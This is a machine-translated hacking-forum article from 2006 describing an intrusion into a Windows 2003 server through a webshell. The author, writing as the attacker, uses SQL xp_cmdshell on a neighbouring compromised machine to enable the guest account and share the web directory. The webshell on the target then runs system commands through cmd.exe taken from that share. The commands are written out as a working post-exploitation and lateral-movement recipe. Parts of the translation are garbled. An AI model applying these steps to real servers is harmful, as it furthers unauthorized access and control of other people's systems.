In the WEBSHELL, the clever use of file sharing to perform system commands-bug warning-the black bar safety net

ID MYHACK58:6220067798
Type myhack58
Reporter 佚名
Modified 2006-03-10T00:00:00


Article author: pt007 (article is very concise, but make it so difficult

Recently in the invasion of Win2003 when found default case not use the system comes with the cmd. exe files to execute system commands, upload the cmd. exe file because the file is too big to fail, then I pass a station adjacent to the machine's file share successfully upload the cmd. exe file, the specific process is as follows: We have acquired the adjacent machine privileges, use SQL's xp_cmdshell command executes the following operations:  net user guest /active:yes open the guest user to allow file sharing anonymous access  net share the web=d:\the web the WEB directory sharing

Then in the target machine on the WEBSHELL on the shell path inside the input: \\\web\cmd.exe

Finally, on the figure of the SHELL path to c:\in cmd. exe to the normal operating system commands.

Since cmd. exe by package upload to the server, I suggest which experts to write an ASP-based RAR decompression software to easy 2 0 0 3 under the server in the upload cmd. exe program.